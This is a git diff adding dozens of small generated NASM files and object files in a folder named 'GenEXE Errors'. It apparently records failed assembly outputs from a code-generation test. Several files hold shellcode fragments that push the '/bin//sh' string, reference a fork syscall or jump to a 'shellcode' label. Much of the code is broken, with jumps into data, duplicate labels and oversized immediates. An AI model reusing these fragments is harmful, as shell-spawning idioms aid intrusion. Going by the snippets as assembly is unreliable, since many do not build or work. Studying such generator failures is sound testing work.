0000000000000000000000000000000000000000..7e92977834de077e6c9beb6694163a1d541b8337 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_305.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_306.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_306.asm new file mode 100644 index 0000000000000000000000000000000000000000..cb98f19585f9b0aa469ab4206baf95cd592fff17 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_306.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push ecx + mov ecx, 15 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_306.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_306.obj new file mode 100644 index 0000000000000000000000000000000000000000..c989452e7ec4926c0dd090886623142832b5acc5 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_306.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_309.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_309.asm new file mode 100644 index 0000000000000000000000000000000000000000..ddc86a6e4e3a548f19d3008d9e00ac0f02fd6aea --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_309.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, [esi+26] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_309.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_309.obj new file mode 100644 index 0000000000000000000000000000000000000000..3610c8b023f367ae9d3356b40c9e4e030931629e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_309.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_312.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_312.asm new file mode 100644 index 0000000000000000000000000000000000000000..0b7ba03b3361074636a6cdb635d44d204615adf7 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_312.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push '-vp13337' + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_312.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_312.obj new file mode 100644 index 0000000000000000000000000000000000000000..e2292dcf16b9e85626a8dc589bf1f794547a6cd4 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_312.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_315.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_315.asm new file mode 100644 index 0000000000000000000000000000000000000000..3a82159b8e324265821204b1151dbeff70e73879 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_315.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp dword [edi], eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_315.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_315.obj new file mode 100644 index 0000000000000000000000000000000000000000..568477f3296b025bd6e807d36648d9b8a9158770 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_315.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_319.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_319.asm new file mode 100644 index 0000000000000000000000000000000000000000..f6cf9cf86c60ec1bdc653bc8c37d90c4fda5018a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_319.asm @@ -0,0 +1,15 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f2f + push 0x6e69622f + push 0x69622f + push 0x69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_319.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_319.obj new file mode 100644 index 0000000000000000000000000000000000000000..c69d7f021dd4e1a7eb0a499be4f7ba129dc87691 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_319.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_323.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_323.asm new file mode 100644 index 0000000000000000000000000000000000000000..527a88436d2703ab239878d68dea03898af7f988 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_323.asm @@ -0,0 +1,14 @@ +section .data + +shellcode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp bl, 0xaa + jz shellcode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_323.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_323.obj new file mode 100644 index 0000000000000000000000000000000000000000..a4c5b1ca21aa9f3d3d11a583a846a31b3d9402f9 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_323.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_327.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_327.asm new file mode 100644 index 0000000000000000000000000000000000000000..ba93f02cf4f9087e9faa61639723487c9ebf08d7 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_327.asm @@ -0,0 +1,13 @@ +section .data + +__nr_fork equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, __nr_fork + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_327.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_327.obj new file mode 100644 index 0000000000000000000000000000000000000000..e013ddf7f356ff6e58f3b307e0085e4ed97165cf Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_327.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_329.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_329.asm new file mode 100644 index 0000000000000000000000000000000000000000..21f3c48838cd738fb41818becbb317157240aa6a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_329.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xchg esi, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_329.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_329.obj new file mode 100644 index 0000000000000000000000000000000000000000..179273c8febfede4da8549171765cc0cff5c5ec3 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_329.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_330.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_330.asm new file mode 100644 index 0000000000000000000000000000000000000000..ad2b7ad50ece7f37e3b84b731520ed01f2635920 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_330.asm @@ -0,0 +1,27 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push dword 0x2 + push dword 0x2 + push dword 0x2 + push dword 0x2 + push dword 0x2 + push dword 0x2 + push dword 0x2 + push dword 0x2 + push dword 0x2 + push dword 0x2 + push dword 0x2 + push dword 0x2 + push dword 0x2 + push dword 0x2 + push dword 0x2 + push dword 0x2 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_330.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_330.obj new file mode 100644 index 0000000000000000000000000000000000000000..1425ee0e10d5d22117002014a621b8fea4a74e5f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_330.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_333.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_333.asm new file mode 100644 index 0000000000000000000000000000000000000000..ed7b92a7e15421f0617fd2c5adac27276c95784c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_333.asm @@ -0,0 +1,95 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp zero68732f + jmp zero68732f + jmp zero68732f + jmp zero68732f + jmp zero6e69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero6e69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_337.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_337.asm new file mode 100644 index 0000000000000000000000000000000000000000..bf73196d40098e1d828fd3dc597bbe4b10583d68 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_337.asm @@ -0,0 +1,25 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + for: dd 0x68732f + dd 0x68732f + dd 0x6e69622f + dd 0x69622f + dd 0x69622f + dd 0x69622f + dd 0x69622f + dd 0x69622f + dd 0x69622f + dd 0x69622f + dd 0x69622f + dd 0x69622f + dd 0x69622f + dd 0x6 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_337.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_337.obj new file mode 100644 index 0000000000000000000000000000000000000000..f077914a5dcbbdd9e84f6df7754cf3160402c709 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_337.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_338.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_338.asm new file mode 100644 index 0000000000000000000000000000000000000000..9cd030a790167c958cf59ef679c7fa005e38c309 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_338.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_338.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_338.obj new file mode 100644 index 0000000000000000000000000000000000000000..12999115e783849892ace85e4d6e56ed5bd18503 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_338.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_339.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_339.asm new file mode 100644 index 0000000000000000000000000000000000000000..fea2777063902f7c9ef34b8590eb882591b8e40f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_339.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push ' in/c' + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_339.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_339.obj new file mode 100644 index 0000000000000000000000000000000000000000..b1c520daf7fdf16da9f789c28b3ea7797e83d2bf Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_339.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_340.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_340.asm new file mode 100644 index 0000000000000000000000000000000000000000..096fe3573509242d2eda822daaa625408fdb847f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_340.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor ebx, ebx + mov eax, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_340.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_340.obj new file mode 100644 index 0000000000000000000000000000000000000000..796d5dd61e53c27276c346478c49e8c24d5099a5 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_340.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_342.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_342.asm new file mode 100644 index 0000000000000000000000000000000000000000..fa9f721686b4f6cdaf4b1ed40a7a367be70071fd --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_342.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f2f + push 0x6e69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_342.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_342.obj new file mode 100644 index 0000000000000000000000000000000000000000..163a4d0a6e0aacbbdcf843153917e301b8941ec4 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_342.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_344.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_344.asm new file mode 100644 index 0000000000000000000000000000000000000000..f9234d0fcf848cc565ca603983138d211e08900b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_344.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xchg ecx, ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_344.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_344.obj new file mode 100644 index 0000000000000000000000000000000000000000..f6428f5d9858e27162df2bce503eed9fb8f1159b Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_344.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_349.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_349.asm new file mode 100644 index 0000000000000000000000000000000000000000..a82e50c412f61c82ac3b0f15716b7fb323af2e5c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_349.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ebx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_349.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_349.obj new file mode 100644 index 0000000000000000000000000000000000000000..0b8bd9ea496f7d0e110e836b01aa5cd8fa2d402c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_349.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_351.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_351.asm new file mode 100644 index 0000000000000000000000000000000000000000..9107b7234dade6cb8137c4ffe9febf563e684da0 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_351.asm @@ -0,0 +1,25 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f + push 0x68732f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_351.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_351.obj new file mode 100644 index 0000000000000000000000000000000000000000..4b7c0d81b495bc454b040c7e4391c3f52285cd54 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_351.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_356.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_356.asm new file mode 100644 index 0000000000000000000000000000000000000000..9cd030a790167c958cf59ef679c7fa005e38c309 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_356.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_356.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_356.obj new file mode 100644 index 0000000000000000000000000000000000000000..1a98f1538417a2804efee5c4997ed4666daab3a0 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_356.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_357.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_357.asm new file mode 100644 index 0000000000000000000000000000000000000000..dc01f6d3617f3a7f8f86df55dd95e2237f306a71 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_357.asm @@ -0,0 +1,11 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_357.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_357.obj new file mode 100644 index 0000000000000000000000000000000000000000..92a3b86e3a4e952e1d5a3a9d4d5d63909642caf5 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_357.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_36.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_36.asm new file mode 100644 index 0000000000000000000000000000000000000000..2e79c8b4006e9b9905ddf7de2e7dab9b03be795c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_36.asm @@ -0,0 +1,15 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + inc esi + inc esi + inc esi + inc esi + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_36.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_36.obj new file mode 100644 index 0000000000000000000000000000000000000000..b9d0daf616789fe7df17c523dc9fde2bb45a2322 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_36.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_360.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_360.asm new file mode 100644 index 0000000000000000000000000000000000000000..2f6996eb6d886191f1a0bdbb64c1e0a25e24c98c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_360.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + sub ecx, 20h + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_360.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_360.obj new file mode 100644 index 0000000000000000000000000000000000000000..32cef0e23a6c6976fd89e7000e51695b61d473e1 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_360.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_364.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_364.asm new file mode 100644 index 0000000000000000000000000000000000000000..2993abdef4bae399506bd86978fde059abdea344 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_364.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor byte [esi + ecx - 1], bh + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_364.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_364.obj new file mode 100644 index 0000000000000000000000000000000000000000..1806bff1ea7d7ac8da357b81a3d6381c32945185 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_364.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_367.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_367.asm new file mode 100644 index 0000000000000000000000000000000000000000..e301b0a51cf9c76412148191defb0e89050d5238 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_367.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov edx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_367.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_367.obj new file mode 100644 index 0000000000000000000000000000000000000000..d1b8fd196f7e56f15f0be3238ece1943b3a54aa5 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_367.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_371.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_371.asm new file mode 100644 index 0000000000000000000000000000000000000000..7d1dfd25c4a4736a23a12e0ac6faecd9ae2790e2 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_371.asm @@ -0,0 +1,19 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov byte [esi], 0x68732f2f + mov byte [esi], 0x68732f + mov byte [esi], 0x6e69622f + mov byte [esi], 0x69622f + mov byte [esi], 0x69622f + mov byte [esi], 0x6e69622f + mov byte [esi], 0x69622f2f + mov byte [esi], 0x69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_371.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_371.obj new file mode 100644 index 0000000000000000000000000000000000000000..83864cbead2f9e6cd3cde86523883be27c1a2e34 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_371.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_373.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_373.asm new file mode 100644 index 0000000000000000000000000000000000000000..f3f01f001ca9798a9c5fa3e955c606db3eb173ef --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_373.asm @@ -0,0 +1,14 @@ +section .data + +shift_decode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor cl, 0xAA + jz shift_decode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_373.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_373.obj new file mode 100644 index 0000000000000000000000000000000000000000..d0433f7f6c26d571c2f8bcaefe1b8e47101953f6 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_373.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_374.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_374.asm new file mode 100644 index 0000000000000000000000000000000000000000..eee32caa2c1c77be2516b43fdd0e34c4b8669437 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_374.asm @@ -0,0 +1,21 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, 0x68732f2f + xor eax, 0x68732f + xor eax, 0x6e69622f + xor eax, 0x69622f + xor eax, 0x69622f + xor eax, 0x69622f + xor eax, 0x69622f + xor eax, 0x69622f2f + xor eax, 0x69622f2f + xor eax, 0x69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_374.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_374.obj new file mode 100644 index 0000000000000000000000000000000000000000..80047e5d8e6f0854dedc1fbdd74e2731f5afafd6 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_374.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_375.asm 